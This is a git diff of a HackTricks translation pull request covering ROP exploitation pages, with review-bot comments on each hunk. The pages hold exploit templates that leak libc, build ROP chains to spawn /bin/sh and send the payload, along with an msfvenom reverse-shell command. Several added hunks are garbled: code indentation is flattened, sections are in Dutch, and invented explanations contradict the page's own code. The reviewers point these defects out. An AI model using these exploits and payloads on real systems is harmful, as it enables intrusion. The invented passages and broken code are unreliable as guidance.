P.recvline().strip() - - # Parse leaked address - log.info(f"Len rop1: {len(rop1)}") - leak = u64(recieved.ljust(8, b"\x00")) - log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") - - # Set lib base address - if LIBC: - LIBC.address = leak - 
LIBC.symbols[libc_func] #Save LIBC base - print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") - log.info("LIBC base @ %s" % hex(LIBC.address)) +# If binary is echoing back the payload, remove that message +recieved = P.recvline().strip() +if OFFSET[:30] in recieved: +recieved = P.recvline().strip() - # If not LIBC yet, stop here - else: - print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") - P.interactive() - - return hex(leak) +# Parse leaked address +log.info(f"Len rop1: {len(rop1)}") +leak = u64(recieved.ljust(8, b"\x00")) +log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") + +# Set lib base address +if LIBC: +LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base +print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") +log.info("LIBC base @ %s" % hex(LIBC.address)) + +# If not LIBC yet, stop here +else: +print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") +P.interactive() + +return hex(leak) get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base 
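Review bot: Hunk `@@ -100,54 +98,54 @@` flattens the bodies of `generate_payload_aligned` and `get_addr` to column 0, and because the originals had nested levels (the `else:` / inner `if (len(payload2) % 16) == 0:` in `generate_payload_aligned`, the `if OFFSET[:30] in recieved:` and `if LIBC:` / `else:` in `get_addr`), the intended structure can no longer be recovered from the `+` side at all. This is a whitespace-only hunk with no translation in it; drop it and leave the code untouched.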
@@ -160,39 +158,39 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base ## Via One_gadget (https://github.com/david942j/one_gadget) # gem install one_gadget def get_one_gadgets(libc): - import string, subprocess - args = ["one_gadget", "-r"] - if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): - args += ["-b", libc.hex()] - else: - args += [libc] - try: - one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] - except: - print("One_gadget isn't installed") - one_gadgets = [] - return +import string, subprocess +args = ["one_gadget", "-r"] +if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): +args += ["-b", libc.hex()] +else: +args += [libc] +try: +one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] +except: +print("One_gadget isn't installed") +one_gadgets = [] +return rop2 = b"" if USE_ONE_GADGET: - one_gadgets = get_one_gadgets(LIBC) - if one_gadgets: - rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains +one_gadgets = get_one_gadgets(LIBC) +if one_gadgets: +rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains ## Normal/Long exploitation if not rop2: - BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh - SYSTEM = LIBC.sym["system"] - EXIT = LIBC.sym["exit"] - - log.info("POP_RDI %s " % hex(POP_RDI)) - log.info("bin/sh %s " % hex(BINSH)) - log.info("system %s " % hex(SYSTEM)) - log.info("exit %s " % hex(EXIT)) - - rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) - rop2 = generate_payload_aligned(rop2) - +BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh +SYSTEM = LIBC.sym["system"] +EXIT = LIBC.sym["exit"] + +log.info("POP_RDI %s " % hex(POP_RDI)) +log.info("bin/sh %s " % hex(BINSH)) +log.info("system %s " % hex(SYSTEM)) +log.info("exit %s " % hex(EXIT)) + +rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) 
#p64(EXIT) +rop2 = generate_payload_aligned(rop2) + print(P.clean()) P.sendline(rop2) @@ -201,51 +199,42 @@ P.interactive() #Interact with your shell :) ``` {% endcode %} -# Common problems +# Algemene probleme -## MAIN\_PLT = elf.symbols\['main'] not found - -If the "main" symbol does not exist. Then you can just where is the main code: +## MAIN\_PLT = elf.symbols\['main'] nie gevind nie +As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: 0000000000401080 <.text>: ``` - -and set the address manually: - +en stel die adres handmatig in: ```python MAIN_PLT = 0x401080 ``` +## Puts nie gevind nie -## Puts not found +As die binaêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van -If the binary is not using Puts you should check if it is using +## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` -## `sh: 1: %s%s%s%s%s%s%s%s: not found` - -If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` - -Try to **subtract 64 bytes to the address of "/bin/sh"**: +As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` +Probeer om **64 byte van die adres van "/bin/sh" af te trek**: ```python BINSH = next(libc.search("/bin/sh")) - 64 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
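Review bot: Hunk `@@ -160,39 +158,39 @@` is another whitespace-only change that removes the indentation of `get_one_gadgets`, `if USE_ONE_GADGET:` and `if not rop2:`, so it must be reverted like the others. Since these lines are being touched anyway, two pre-existing defects visible on them are worth a follow-up: `+return` at the end of `get_one_gadgets` returns `None` instead of `one_gadgets`, so `+if one_gadgets:` never succeeds and the one_gadget path is dead (should be `return one_gadgets`); and `+rop2 = p64(one_gadgets[0]) + "\x00"*100` concatenates bytes with a str, which raises a TypeError on Python 3 (should be `b"\x00"*100`).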
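Review bot: In hunk `@@ -201,51 +199,42 @@` of rop-leaking-libc-template.md, "binaêre" in `+As die binaêre lêer nie Puts gebruik nie` is a typo for "binêre" (the README copy of this same section spells it correctly, and the two should stay identical). As in the README, ``+## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` `` and the sentence after it translate the literal message the shell prints; keep "not found" inside the code spans so the heading matches what readers see on their terminal.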
- - diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md index afef61443..e743c87ab 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md +++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md @@ -1,32 +1,31 @@ -# ROP - call sys\_execve +# ROP - roep sys_execve aan
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-In order to prepare the call for the **syscall** it's needed the following configuration: +Om de oproep voor de **syscall** voor te bereiden, is de volgende configuratie nodig: -* `rax: 59 Specify sys_execve` -* `rdi: ptr to "/bin/sh" specify file to execute` -* `rsi: 0 specify no arguments passed` -* `rdx: 0 specify no environment variables passed` +* `rax: 59 Specificeer sys_execve` +* `rdi: ptr naar "/bin/sh" specificeer het uit te voeren bestand` +* `rsi: 0 specificeer dat er geen argumenten worden doorgegeven` +* `rdx: 0 specificeer dat er geen omgevingsvariabelen worden doorgegeven` -So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). +Dus, in feite is het nodig om de string `/bin/sh` ergens te schrijven en vervolgens de `syscall` uit te voeren (met inachtneming van de padding die nodig is om de stack te controleren). -## Control the registers - -Let's start by finding **how to control those registers**: +## Beheer de registers +Laten we beginnen met het vinden van **hoe we die registers kunnen beheersen**: ```c ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x0000000000415664 : pop rax ; ret @@ -34,15 +33,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x00000000004101f3 : pop rsi ; ret 0x00000000004498b5 : pop rdx ; ret ``` +Met hierdie adresse is dit moontlik om die inhoud in die stoor te skryf en dit in die registre te laai. -With these addresses it's possible to **write the content in the stack and load it into the registers**. +## Skryf string -## Write string - -### Writable memory - -Frist you need to find a writable place in the memory +### Skryfbare geheue +Eerstens moet jy 'n skryfbare plek in die geheue vind. ```bash gef> vmmap [ Legend: Code | Heap | Stack ] 
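Review bot: Hunk `@@ -1,32 +1,31 @@` of rop-syscall-execv.md is in Dutch rather than Afrikaans: `+Andere manieren om HackTricks te ondersteunen:`, `+* Als je je **bedrijf wilt adverteren in HackTricks** ...`, `+Om de oproep voor de **syscall** voor te bereiden, is de volgende configuratie nodig:` and `+Laten we beginnen met het vinden van ...`. The same footer is rendered in Afrikaans in every other file of this PR ("Ander maniere om HackTricks te ondersteun:", "As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** ..."), and this hunk also translates the link text "SUBSCRIPTION PLANS" to "ABONNEMENTSPAKKETTEN" while the other files keep it; redo this hunk to match the rest of the PR. The register descriptions inside the inline code spans (`rax: 59 Specificeer sys_execve` etc.) were also translated, which is at odds with the rest of the PR leaving code-span contents alone.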
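Review bot: In hunk `@@ -34,15 +33,13 @@`, "stoor" in `+Met hierdie adresse is dit moontlik om die inhoud in die stoor te skryf en dit in die registre te laai.` means "store/storage", not "stack"; the Afrikaans term is "stapel" (die inhoud op die stapel te skryf). The bold that the original puts on "write the content in the stack and load it into the registers" was also dropped, so the emphasis differs from the rest of the page.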
@@ -51,18 +48,44 @@ Start End Offset Perm Path 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap] ``` +### Skryf String -### Write String - -Then you need to find a way to write arbitrary content in this address - +Dan moet jy 'n manier vind om willekeurige inhoud op hierdie adres te skryf ```python ROPgadget --binary speedrun-001 | grep " : mov qword ptr \[" mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx ``` +#### 32-bits -#### 32 bits +##### ROP (Return Oriented Programming) +ROP is a technique used in exploitation to bypass security measures like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). It involves chaining together small pieces of code, known as gadgets, to perform malicious actions. + +##### Syscall + +A syscall is a way for a program to request services from the operating system. In Linux, syscalls are identified by a number, and the parameters for the syscall are passed in registers. + +##### Execv + +The execv syscall is used to execute a program in Linux. It takes two arguments: the path to the program and an array of strings representing the program's arguments. + +##### ROP + Syscall + Execv + +To execute a program using ROP, we need to find gadgets that perform the necessary syscalls and set the appropriate registers. We can then chain these gadgets together to create a ROP chain that calls execv with the desired program and arguments. + +##### Example + +Here is an example of a ROP chain that calls execv to execute the "/bin/sh" program: + +1. Find gadgets that set the registers for the execv syscall. +2. Find a gadget that sets the EAX register to the syscall number for execv. +3. Find a gadget that sets the EBX register to the address of the "/bin/sh" string. +4. 
Find a gadget that sets the ECX register to the address of the argument array. +5. Find a gadget that sets the EDX register to 0 (no environment variables). +6. Find a gadget that performs the syscall instruction. +7. Chain these gadgets together in the correct order, setting the registers and performing the syscall. + +By carefully constructing the ROP chain, we can execute arbitrary programs with arbitrary arguments, giving us full control over the system. ```python ''' Lets write "/bin/sh" to 0x6b6000 
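Review bot: The `+` lines in hunk `@@ -51,18 +48,44 @@` from `+##### ROP (Return Oriented Programming)` down to `+By carefully constructing the ROP chain, we can execute arbitrary programs ...` have no counterpart on the `-` side: the source has just `-#### 32 bits` followed by the code block. This text was generated rather than translated, it is in English in an Afrikaans PR, and it describes an EAX/EBX/ECX/EDX register convention that the page's own register list (rax, rdi, rsi, rdx) and the `popRax` gadget in the code do not use. Drop all of it and keep only `+#### 32-bits`.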
@@ -84,9 +107,42 @@ rop += popRax rop += p32(0x6b6000 + 4) rop += writeGadget ``` +#### 64-bits -#### 64 bits +##### ROP + Syscall + execv +Hierdie tegniek maak gebruik van Return-Oriented Programming (ROP) in kombinasie met die Syscall-instruksie en die execv-sisteemoproep om 'n uitvoerbare lêer uit te voer op 'n 64-bits Linux-stelsel. + +##### Stap 1: Identifiseer die funksies + +Eerstens moet ons die funksies identifiseer wat ons sal gebruik in ons ROP-ketting. Ons het die volgende funksies nodig: + +- `mprotect`: Hierdie funksie sal ons toelaat om die uitvoerbare geheuegebied te verander na lees-, skryf- en uitvoerbare (rwx) toestand. +- `read`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer in die geheue te lees. +- `execve`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer uit te voer. + +##### Stap 2: Bou die ROP-ketting + +Ons sal die volgende stappe volg om die ROP-ketting te bou: + +1. Kry die adres van die `mprotect`-funksie in die geheue. +2. Kry die adres van die `read`-funksie in die geheue. +3. Kry die adres van die `execve`-funksie in die geheue. +4. Kry die adres van die uitvoerbare lêer in die geheue. +5. Bou die ROP-ketting deur die funksie-adresse en die nodige argumente in die regte volgorde te stapel. + +##### Stap 3: Voer die ROP-ketting uit + +Nadat die ROP-ketting gebou is, kan ons dit uitvoer deur die Syscall-instruksie te gebruik. Hier is die stappe wat ons moet volg: + +1. Stel die regsiters korrek in vir die Syscall-instruksie. +2. Voer die Syscall-instruksie uit. + +##### Stap 4: Verifieer die uitvoering + +Om te verseker dat die uitvoering suksesvol was, kan ons die uitvoer van die uitvoerbare lêer monitor. + +Met hierdie tegniek kan ons 'n uitvoerbare lêer uitvoer op 'n 64-bits Linux-stelsel deur gebruik te maak van ROP, die Syscall-instruksie en die execv-sisteemoproep. ```python ''' Lets write "/bin/sh" to 0x6b6000 
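Review bot: Hunk `@@ -84,9 +107,42 @@` inserts an invented section (`+##### ROP + Syscall + execv` through `+Met hierdie tegniek kan ons 'n uitvoerbare lêer uitvoer ...`) that does not correspond to anything on the `-` side and contradicts the code it precedes: it describes resolving `mprotect`, `read` and `execve` function addresses and reading an executable into memory, whereas the chain below writes "/bin/sh" to `0x6b6000` with the `mov qword ptr [rax], rdx` gadget and then issues the execve syscall with the registers listed at the top of the page. Remove these lines and keep only `+#### 64-bits`. "regsiters" in `+1. Stel die regsiters korrek in` would also need fixing if any of the text were kept.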
@@ -102,9 +158,35 @@ rop += popRax rop += p64(0x6b6000) # Writable memory rop += writeGadget #Address to: mov qword ptr [rax], rdx ``` +## Voorbeeld -## Example +In this example, we will use a basic ROP (Return-Oriented Programming) technique to execute the `execv` system call in a Linux environment. +In hierdie voorbeeld sal ons 'n basiese ROP (Return-Oriented Programming) tegniek gebruik om die `execv` stelseloproep in 'n Linux omgewing uit te voer. + +First, we need to find the addresses of the gadgets we will use in our ROP chain. We can use tools like `ROPgadget` or `ropper` to search for gadgets in the binary. + +Eerstens moet ons die adresse van die gadgets wat ons in ons ROP-ketting sal gebruik, vind. Ons kan gereedskap soos `ROPgadget` of `ropper` gebruik om gadgets in die binêre lêer te soek. + +Once we have the addresses, we can start building our ROP chain. The ROP chain will consist of the addresses of the gadgets we want to use, followed by the arguments for the `execv` system call. + +Sodra ons die adresse het, kan ons begin om ons ROP-ketting te bou. Die ROP-ketting sal bestaan uit die adresse van die gadgets wat ons wil gebruik, gevolg deur die argumente vir die `execv` stelseloproep. + +We will need gadgets that perform the following actions: +1. Load the address of the `/bin/sh` string into a register. +2. Load the address of the `execv` function into a register. +3. Load the arguments for the `execv` function into registers. +4. Call the `execv` function. + +Ons sal gadgets benodig wat die volgende aksies uitvoer: +1. Laai die adres van die `/bin/sh` string in 'n register. +2. Laai die adres van die `execv` funksie in 'n register. +3. Laai die argumente vir die `execv` funksie in registers. +4. Roep die `execv` funksie aan. + +Once we have our ROP chain, we can trigger the vulnerability to execute our ROP chain and ultimately the `execv` system call. 
+ +Sodra ons ons ROP-ketting het, kan ons die kwesbaarheid aktiveer om ons ROP-ketting en uiteindelik die `execv` stelseloproep uit te voer. ```python from pwn import * @@ -169,23 +251,22 @@ payload = "0"*0x408 + rop # Send the payload, drop to an interactive shell to use our new shell target.sendline(payload) -target.interactive() +target.interactive() ``` - -## References +## Verwysings * [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md index 24531da75..d9f59573e 100644 --- a/exploiting/tools/README.md +++ b/exploiting/tools/README.md @@ -1,22 +1,19 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# Metasploit - ``` pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset 
@@ -24,72 +21,101 @@ nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` +## Skulpe -## Shellcodes +'n Skulp is 'n klein stukkie uitvoerbare kode wat gebruik word in die uitbuiting van 'n sekuriteitskwesbaarheid om toegang tot 'n rekenaarstelsel te verkry. Dit is gewoonlik in masjienkode en word gebruik om 'n spesifieke taak uit te voer, soos die verkryging van beheer oor 'n stelsel of die uitvoering van 'n sekere funksie. +Skulpe word dikwels gebruik in die konteks van aanvalle soos bufferoorloopaanvalle, waar die aanvaller probeer om buite die grense van 'n toegewysde geheuegebied te skryf en sodoende die uitvoering van eie kode te bewerkstellig. Hierdie kode kan dan gebruik word om die aanvaller toegang tot die stelsel te gee, vertroulike inligting te steel of ander skadelike aktiwiteite uit te voer. + +Daar is verskillende tipes skulpe, insluitend bindskulpe en omgekeerde skulpe. 'n Bindskulp is 'n stukkie kode wat 'n verbinding met die aanvaller se stelsel vestig en die beheer oor die aangevalle stelsel oorneem. 'n Omgekeerde skulp daarenteen maak dit vir die aanvaller moontlik om 'n verbinding met die aangevalle stelsel te maak en dit vanaf sy eie stelsel te beheer. + +Die ontwikkeling van skulpe vereis 'n goeie begrip van masjienkode en die spesifieke stelsel waarop dit uitgevoer word. Dit is belangrik om te verseker dat die skulp korrek geoptimaliseer is vir die teikenstelsel en dat dit nie opgespoor of geblokkeer kan word deur sekuriteitsmaatreëls nie. ``` msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` - # GDB -## Install +## Installeer +Om GDB te installeren, volg je de onderstaande stappen: + +### Linux + +1. Open een terminalvenster. +2. Voer het volgende commando in om GDB te installeren: + + ```bash + sudo apt-get install gdb + ``` + +### macOS + +1. Open een terminalvenster. +2. 
Voer het volgende commando in om GDB te installeren met Homebrew: + + ```bash + brew install gdb + ``` + +### Windows + +1. Download de GDB-installatiebestanden van de officiële website. +2. Voer het installatieprogramma uit en volg de instructies op het scherm. + +Zodra de installatie is voltooid, kun je GDB gebruiken om programma's te debuggen en te analyseren. ``` apt-get install gdb ``` - ## Parameters -**-q** --> No show banner\ -**-x \** --> Auto-execute GDB instructions from here\ -**-p \** --> Attach to process +**-q** --> Geen banner wysig\ +**-x \** --> Voer GDB instruksies outomaties uit vanaf hier\ +**-p \** --> Koppel aan proses -### Instructions +### Instruksies -\> **disassemble main** --> Disassemble the function\ +\> **disassemble main** --> Ontleed die funksie\ \> **disassemble 0x12345678**\ \> **set disassembly-flavor intel**\ -\> **set follow-fork-mode child/parent** --> Follow created process\ -\> **p system** --> Find the address of the system function\ +\> **set follow-fork-mode child/parent** --> Volg geskep prosesse\ +\> **p system** --> Vind die adres van die system funksie\ \> **help**\ \> **quit** -\> **br func** --> Add breakpoint to function\ +\> **br func** --> Voeg breekpunt by funksie by\ \> **br \*func+23**\ \> **br \*0x12345678**\ -**> del NUM** --> Delete that number of br\ -\> **watch EXPRESSION** --> Break if the value changes +**> del NUM** --> Verwyder daardie aantal breekpunte\ +\> **watch UITDRUKKING** --> Breek as die waarde verander -**> run** --> Execute\ -**> start** --> Start and break in main\ -\> **n/next** --> Execute next instruction (no inside)\ -\> **s/step** --> Execute next instruction\ -\> **c/continue** --> Continue until next breakpoint +**> run** --> Voer uit\ +**> start** --> Begin en breek in main\ +\> **n/next** --> Voer volgende instruksie uit (nie binne nie)\ +\> **s/step** --> Voer volgende instruksie uit\ +\> **c/continue** --> Gaan voort tot volgende breekpunt -\> **set $eip = 0x12345678** --> 
Change value of $eip\ -\> **info functions** --> Info abount functions\ -\> **info functions func** --> Info of the funtion\ -\> **info registers** --> Value of the registers\ -\> **bt** --> Stack\ -\> **bt full** --> Detailed stack +\> **set $eip = 0x12345678** --> Verander waarde van $eip\ +\> **info functions** --> Inligting oor funksies\ +\> **info functions func** --> Inligting oor die funksie\ +\> **info registers** --> Waarde van die registers\ +\> **bt** --> Stapel\ +\> **bt full** --> Gedetailleerde stapel -\> **print variable**\ -\> **print 0x87654321 - 0x12345678** --> Caculate\ -\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii +\> **print veranderlike**\ +\> **print 0x87654321 - 0x12345678** --> Bereken\ +\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Wys inhoud in oktaal/heksadesimale/10/binêre/instruksie/ASCII * **x/o 0xDir\_hex** -* **x/2x $eip** --> 2Words from EIP +* **x/2x $eip** --> 2 Woorde vanaf EIP * **x/2x $eip -4** --> $eip - 4 -* **x/8xb $eip** --> 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes) -* **i r eip** --> Value of $eip -* **x/w pointer** --> Value of the pointer -* **x/s pointer** --> String pointed by the pointer -* **x/xw \&pointer** --> Address where the pointer is located -* **x/i $eip** —> Instructions of the EIP +* **x/8xb $eip** --> 8 byte (b-> byte, h-> 2 byte, w-> 4 byte, g-> 8 byte) +* **i r eip** --> Waarde van $eip +* **x/w pointer** --> Waarde van die wyser +* **x/s pointer** --> String wat deur die wyser aangedui word +* **x/xw \&pointer** --> Adres waar die wyser geleë is +* **x/i $eip** —> Instruksies van die EIP ## [GEF](https://github.com/hugsy/gef) - ```bash checksec #Check protections p system #Find system function address 
@@ -109,34 +135,32 @@ pattern search $rsp #Search the offset given the content of $rsp 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f Stack level 0, frame at 0x7fffffffddd0: - rip = 0x400cd3; saved rip = 0x6261617762616176 - called by frame at 0x7fffffffddd8 - Arglist at 0x7fffffffdcf8, args: - Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 - Saved registers: - rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 +rip = 0x400cd3; saved rip = 0x6261617762616176 +called by frame at 0x7fffffffddd8 +Arglist at 0x7fffffffdcf8, args: +Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 +Saved registers: +rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 gef➤ pattern search 0x6261617762616176 [+] Searching for '0x6261617762616176' [+] Found at offset 184 (little-endian search) likely ``` +## Truuks -## Tricks +### GDB dieselfde adresse -### GDB same addresses - -While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing: +Terwyl jy GDB foutopsporing doen, sal GDB **effens verskillende adresse hê as die een wat deur die binêre lêer gebruik word 